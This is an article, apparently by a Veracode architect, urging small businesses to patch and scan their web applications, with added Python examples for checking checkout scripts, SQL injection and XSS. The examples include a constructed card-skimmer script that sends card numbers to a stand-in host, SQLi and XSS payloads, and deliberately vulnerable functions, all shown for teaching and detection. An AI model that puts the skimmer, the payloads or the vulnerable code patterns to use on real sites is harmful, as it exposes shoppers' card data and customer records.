Why small businesses must stay on top of web application security

Nearly 6,000 retail sites were recently found to be skimming their customers' credit cards: attackers had injected malicious JavaScript into the e-commerce pages, so that payment card data was stolen as shoppers typed it in at checkout.

Compared with the 500 million user records breached at Yahoo, this may seem a small number, but the attack highlights the significant risk that cybercrime poses to small businesses.

The latest Government Security Breaches Survey confirms that small businesses are at increasing risk from cyber-attacks: nearly three-quarters of small firms reported a security breach in 2015, up on the 2013 and 2014 surveys. So what can small business owners do to protect themselves?

Understanding of cyber-security issues remains low

Despite the growing threat, understanding of cybersecurity remains low among small business owners. Research conducted by the government's Cyber Streetwise campaign found that two thirds of SMBs do not consider their business to be vulnerable.

Too frequently, cybersecurity processes are reduced to simple anti-virus software or a traditional firewall, ignoring some of the key threats that web-facing organisations are exposed to.

In the Magento card-skimming case, for instance, many of the retailers affected were small and simply did not have the resources to determine whether their website was secure. Web application attacks account for over 40% of incidents that result in a data breach, according to the Verizon DBIR 2016, and are the single biggest source of data loss.
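
One thing a small retailer can do without a security team is list every script its checkout page actually serves and compare that against what it intended to serve. The check below is an added example, not code from the article or from Magento; the hostnames, the allow-list and the sample checkout page are constructed, and the inline-script test is a simple heuristic rather than a complete skimmer detector.

```python
# Added example, not code from the article: a check a retailer can run over a saved copy
# of a checkout page to list the scripts it serves and flag ones it did not put there.
# The hostnames, the allow-list and the sample page are constructed for illustration,
# and the inline-script test is a simple heuristic, not a full skimmer detector.
from html.parser import HTMLParser
from urllib.parse import urlparse

# Form-field names that hint a script touches card data, and JavaScript constructs that
# send data off the page. An inline script using both is worth a human look.
CARD_FIELD_HINTS = ("cc_number", "cardnumber", "card_number", "cvv", "cvc", "expiry")
EXFIL_SINKS = ("new Image(", "XMLHttpRequest", "fetch(", "sendBeacon(", "WebSocket(")


class ScriptCollector(HTMLParser):
    """Collects external script sources and inline script bodies from an HTML page."""

    def __init__(self):
        super().__init__()
        self.external = []   # (src, has_integrity_attribute)
        self.inline = []     # inline script bodies
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        attrs = dict(attrs)
        if attrs.get("src"):
            self.external.append((attrs["src"], "integrity" in attrs))
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def audit_scripts(page_html, allowed_hosts):
    """Return (severity, description) findings for the scripts in page_html.

    allowed_hosts: the third-party hostnames the site owner expects to load JavaScript from.
    Same-origin scripts (relative src) are assumed to be the shop's own and are not flagged.
    """
    collector = ScriptCollector()
    collector.feed(page_html)
    findings = []
    for src, has_integrity in collector.external:
        host = urlparse(src).hostname
        if host is None:
            continue
        if host not in allowed_hosts:
            findings.append(("high", "script loaded from unexpected host %s: %s" % (host, src)))
        elif not has_integrity:
            findings.append(("medium", "third-party script without Subresource Integrity: %s" % src))
    for body in collector.inline:
        reads_card_fields = any(hint in body.lower() for hint in CARD_FIELD_HINTS)
        sends_data = any(sink in body for sink in EXFIL_SINKS)
        if reads_card_fields and sends_data:
            findings.append(("high", "inline script reads card fields and sends data off-page"))
    return findings


# Constructed checkout page: the shop's own script, a pinned CDN library, an unpinned
# analytics script, and two things an attacker might have added.
SAMPLE_CHECKOUT_PAGE = """<html><head>
<script src="/js/checkout.js"></script>
<script src="https://cdn.example/jquery.min.js" integrity="sha384-constructed" crossorigin="anonymous"></script>
<script src="https://cdn.example/analytics.js"></script>
<script src="https://static-cdn-update.example/mage.js"></script>
</head><body>
<form id="checkout"><input id="cc_number"><input id="cvv"></form>
<script>
document.getElementById('checkout').addEventListener('submit', function () {
  var n = document.getElementById('cc_number').value;
  new Image().src = 'https://static-cdn-update.example/c?d=' + encodeURIComponent(n);
});
</script>
</body></html>"""

if __name__ == "__main__":
    for severity, description in audit_scripts(SAMPLE_CHECKOUT_PAGE, {"cdn.example"}):
        print(severity.upper(), description)
```

Run against the constructed page it reports three findings: the analytics script that is on the allow-list but has no integrity hash, the script from a host the shop never approved, and the inline script that reads the card number field and sends it off-page. The shop's own relative script and the integrity-pinned library pass. Repeating this against a fresh copy of the live page after every deployment, and whenever a plugin is installed, turns "is our site secure?" into a question with a checkable answer for at least this attack class.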

Attackers exploit the fact that small firms typically do not keep their software patched, whether that software is developed in-house or bought in. In this latest case, Magento's e-commerce shopping cart was the centre of attention.

Both the commercial and the community (free) editions of this extremely popular shopping-cart software have patches available for the vulnerability being exploited. So while the publisher is responsive in providing security patches, those patches are simply not being applied, or are not being applied effectively.

Who do we blame?

What do we do about this situation? We could blame the open source-community, retailers, hosting providers or even government. The truth is, the more we look for a single silver bullet, the further we move away from an answer.

Veracode's own research has found, for example, that as many as 25% of all Java applications include a vulnerable version (3.2.1) of the Apache Commons Collections library, the version affected by a widely known Java deserialisation flaw. The vulnerability is highly exploitable, and it finds its way not only into web applications but also into the application servers that host them. This does not mean that open-source software is bad, but organisations must do their homework to ensure that the components they depend on are kept up to date and their software remains robustly secure.

There is a danger that consumer confidence will reach a point of no return when it comes to transacting and providing private information on the Internet.

Regulations that encourage companies to test for vulnerabilities should be introduced to ensure that all organisations are accounting for this common attack vector. And, yes, there should also be consequences for firms that are cavalier with customers’ data – government could do much more in this area.

Hosting providers should be asked to do more to detect and protect sites by promoting good patching practice, with financial incentives made available to firms that can demonstrate they are taking security seriously.

What can businesses do to improve cybersecurity?

Hackers are constantly looking for vulnerable code in software to exploit for malicious gain. Meanwhile, software vendors and security companies constantly release updates and patches to fix vulnerable code as soon as it is identified; those fixes only stop cybercriminals in their tracks once they are actually installed.

Organisations should regularly analyse their web applications to ensure that the code does not contain common vulnerabilities, such as SQL injection (SQLi) or Cross-Site Scripting (XSS). These flaws, which have featured in the OWASP Top 10 for the best part of the past decade, can have severe consequences for organisations, as TalkTalk can testify following its 2015 breach, which began with a SQL injection attack.
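
To make the two flaws concrete, here is each one as the vulnerable pattern next to its fix. This is an added example, not code from the article, from Magento or from TalkTalk; the orders table, its rows and the function names are constructed for illustration, and it runs against an in-memory SQLite database so nothing outside the script is touched.

```python
# Added example, not code from the article: the two flaws named above, each shown as the
# vulnerable pattern next to its fix, run against an in-memory SQLite database.
# The orders table, its rows and the function names are constructed for illustration.
import html
import sqlite3


def make_db():
    """Build a throwaway database with a few constructed order records."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE orders (id INTEGER, customer_email TEXT, card_last4 TEXT)")
    con.executemany("INSERT INTO orders VALUES (?, ?, ?)", [
        (1001, "alice@example.com", "4242"),
        (1002, "bob@example.com", "1881"),
        (1003, "carol@example.com", "0005"),
    ])
    return con


def order_lookup_vulnerable(con, order_id, email):
    """SQL injection: user input is spliced into the statement text with %."""
    sql = ("SELECT id, card_last4 FROM orders WHERE id = '%s' AND customer_email = '%s'"
           % (order_id, email))
    return con.execute(sql).fetchall()


def order_lookup_safe(con, order_id, email):
    """Fix: bound parameters. The database never parses the input as SQL."""
    sql = "SELECT id, card_last4 FROM orders WHERE id = ? AND customer_email = ?"
    return con.execute(sql, (order_id, email)).fetchall()


# Classic tautology payload: it closes the quoted string and appends a condition that is
# always true, so the WHERE clause matches every row in the table.
SQLI_PAYLOAD = "' OR '1'='1"


def render_greeting_vulnerable(name):
    """Reflected XSS: the name is written into HTML markup unescaped."""
    return "<p>Welcome, %s!</p>" % name


def render_greeting_safe(name):
    """Fix: escape <, >, &, and quotes so the browser renders the input as text."""
    return "<p>Welcome, %s!</p>" % html.escape(name, quote=True)


XSS_PAYLOAD = "<script>alert(document.cookie)</script>"


if __name__ == "__main__":
    con = make_db()
    print("legitimate lookup:   ", order_lookup_vulnerable(con, "1001", "alice@example.com"))
    print("vulnerable + payload:", order_lookup_vulnerable(con, "1001", SQLI_PAYLOAD))
    print("safe + payload:      ", order_lookup_safe(con, "1001", SQLI_PAYLOAD))
    print(render_greeting_vulnerable(XSS_PAYLOAD))
    print(render_greeting_safe(XSS_PAYLOAD))
```

With the payload in the email field, the vulnerable lookup returns every order in the table, including other customers' card digits, because the statement becomes `... AND customer_email = '' OR '1'='1'`. The parameterised version returns nothing for the same input, since the payload is compared as a literal string rather than parsed as SQL. The XSS pair shows the same principle at the HTML layer: output encoding, not input filtering, is what keeps data from becoming code.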

Both static analysis, which examines an application's source code or binaries without executing them, and dynamic analysis, which probes the running application from the outside to find exploitable behaviour, can help organisations detect and remediate security flaws. The two catch different classes of problem, so neither is a substitute for the other.
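
To show what "testing without executing" means in practice, the following is a toy static check added here as an example; it is not code from the article and not how Veracode's or any commercial scanner works. It parses Python source into a syntax tree and flags `execute()` calls whose SQL text is assembled at runtime (string concatenation, `%` formatting, `.format()` or an f-string) instead of a constant with bound parameters. It follows one simple `sql = ...` assignment inside a function but does no real data-flow analysis; the scanned source is constructed for illustration.

```python
# Added example, not from the article: a toy static check in the spirit of static analysis.
# It parses Python source without running it and flags database execute() calls whose SQL
# text is built at runtime rather than being a constant with bound parameters.
# This is not how Veracode's or any commercial scanner works; the scanned source is constructed.
import ast


def _is_dynamic_sql(node):
    """True if the expression builds a string at runtime (concatenation, %, .format, f-string)."""
    if isinstance(node, ast.BinOp) and isinstance(node.op, (ast.Add, ast.Mod)):
        return True
    if isinstance(node, ast.JoinedStr):  # f"..." literal
        return True
    if (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)
            and node.func.attr == "format"):
        return True
    return False


def find_unsafe_execute(source):
    """Return (function_name, line_number) for each execute()/executemany() call in `source`
    whose first argument is dynamically built SQL. Only calls inside functions are examined,
    and only one level of `name = expr` assignment is followed."""
    tree = ast.parse(source)
    findings = []
    for func in [n for n in ast.walk(tree) if isinstance(n, ast.FunctionDef)]:
        # Record simple local assignments so `sql = "..." % x; con.execute(sql)` is followed.
        assigned = {}
        for node in ast.walk(func):
            if (isinstance(node, ast.Assign) and len(node.targets) == 1
                    and isinstance(node.targets[0], ast.Name)):
                assigned[node.targets[0].id] = node.value
        for node in ast.walk(func):
            if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)):
                continue
            if node.func.attr not in ("execute", "executemany") or not node.args:
                continue
            sql = node.args[0]
            if isinstance(sql, ast.Name):
                sql = assigned.get(sql.id, sql)
            if _is_dynamic_sql(sql):
                findings.append((func.name, node.lineno))
    return findings


# Constructed source to scan: two injectable lookups and one parameterised lookup.
SAMPLE_SOURCE = '''
def lookup_vulnerable(con, email):
    sql = "SELECT id FROM orders WHERE customer_email = '%s'" % email
    return con.execute(sql).fetchall()

def lookup_fstring(con, email):
    return con.execute(f"SELECT id FROM orders WHERE customer_email = '{email}'").fetchall()

def lookup_safe(con, email):
    return con.execute("SELECT id FROM orders WHERE customer_email = ?", (email,)).fetchall()
'''

if __name__ == "__main__":
    for name, line in find_unsafe_execute(SAMPLE_SOURCE):
        print("%s: line %d builds SQL from variables; use bound parameters" % (name, line))
```

Against the constructed source it reports `lookup_vulnerable` (line 4) and `lookup_fstring` (line 7) and stays silent on `lookup_safe`. The limits are the point: a value that reaches `execute()` through a helper function, a class attribute or a dictionary would slip past it, which is exactly why real static analysers track data flow across the whole program, and why dynamic testing of the running application is still needed to confirm what is actually exploitable.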

Frequently scan apps for vulnerabilities

For companies that are developing their own applications, whether for internal or external use, it is essential that those applications are scanned for vulnerabilities frequently. It is not enough to test once and assume the application is perpetually secure: new flaws are introduced with every code change, and new vulnerabilities in third-party components are disclosed all the time, so applications should be rescanned regularly and ideally on every release.

However, a challenge for even those organisations which understand the threat web application vulnerabilities can pose is identifying all the apps that need to be scanned. While the application footprint may be much lower for the average SMB, unused blogs or microsites for old competitions, for example, can leave an organisation vulnerable to exploitation.

Identifying the entire web perimeter is an essential step for any organisation seeking to remediate this threat. Whether ensuring all applications are then frequently scanned or shutting down those that are no longer in use, full visibility into the web perimeter can help significantly reduce cyber risk.

The time to react

Small businesses cannot afford to neglect the threat that vulnerable web facing applications pose, because cybercriminals have caught on and are taking advantage of the ‘head in the sand’ approach taken by many companies.

Simple steps, such as ensuring that patches are installed promptly and that software is kept on supported versions, can significantly reduce the threat that cybercrime poses to a business.

About the author

This article has been written exclusively for ByteStart by Paul Farrington, manager of EMEA solution architects at Veracode, a leader in securing the world’s software.
